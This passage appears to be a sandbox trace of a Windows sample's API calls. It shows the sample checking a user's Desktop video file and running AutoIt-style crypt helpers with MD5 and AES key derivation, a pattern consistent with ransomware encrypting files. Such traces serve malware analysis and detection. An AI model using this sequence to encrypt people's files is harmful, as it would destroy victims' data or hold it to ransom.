cchCount2=10) returned 1 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Desktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="esktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ktop\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="top\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="op\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gV7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qJagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JagBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="agBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gBY9A.mkv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0161.459] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.459] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0161.459] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0161.459] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.459] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.459] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.459] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.459] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0161.459] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.460] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ecd740, ftCreationTime.dwHighDateTime=0x1d5e024, ftLastAccessTime.dwLowDateTime=0x92721dc0, ftLastAccessTime.dwHighDateTime=0x1d5e470, ftLastWriteTime.dwLowDateTime=0x92721dc0, ftLastWriteTime.dwHighDateTime=0x1d5e470, nFileSizeHigh=0x0, nFileSizeLow=0x18b40, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="gV7qJagBY9A.mkv", cAlternateFileName="GV7QJA~1.MKV")) returned 0x90ae18 [0161.460] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0161.460] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.460] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.460] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.460] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.460] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0161.460] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.460] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0161.460] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.460] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.460] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0161.460] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.460] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.460] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.460] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.465] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.465] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0161.465] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.465] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0161.466] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.466] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.466] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0161.466] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.466] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.466] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.466] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.466] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.466] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.466] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.466] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0161.466] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0161.466] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.466] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.466] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.467] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0161.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.467] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0161.467] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.467] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0161.467] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0161.467] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.467] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.467] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0161.467] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.467] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0161.467] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0161.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.467] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.467] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.467] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.467] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.467] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.467] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0161.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.467] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.468] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0161.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.468] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.468] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.468] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.468] CryptHashData (hHash=0x90af58, pbData=0x8def38, dwDataLen=0x19, dwFlags=0x1) returned 1 [0161.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.468] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.468] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.468] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0161.468] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0161.468] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.468] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0161.468] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.469] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.469] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.469] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.469] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.469] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0161.469] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0161.469] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0161.469] CryptDestroyHash (hHash=0x90af58) returned 1 [0161.469] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0161.469] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.469] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.469] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.469] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.470] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gV7qJagBY9A.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gv7qjagby9a.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0161.470] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.470] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0161.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0161.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0161.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0161.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0161.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0161.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0161.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0161.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.470] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0161.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0161.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0161.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0161.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.470] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0161.470] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0161.471] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0161.471] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0161.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28e8 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0161.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0161.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0161.471] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0161.471] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0161.471] RtlAllocateHeap 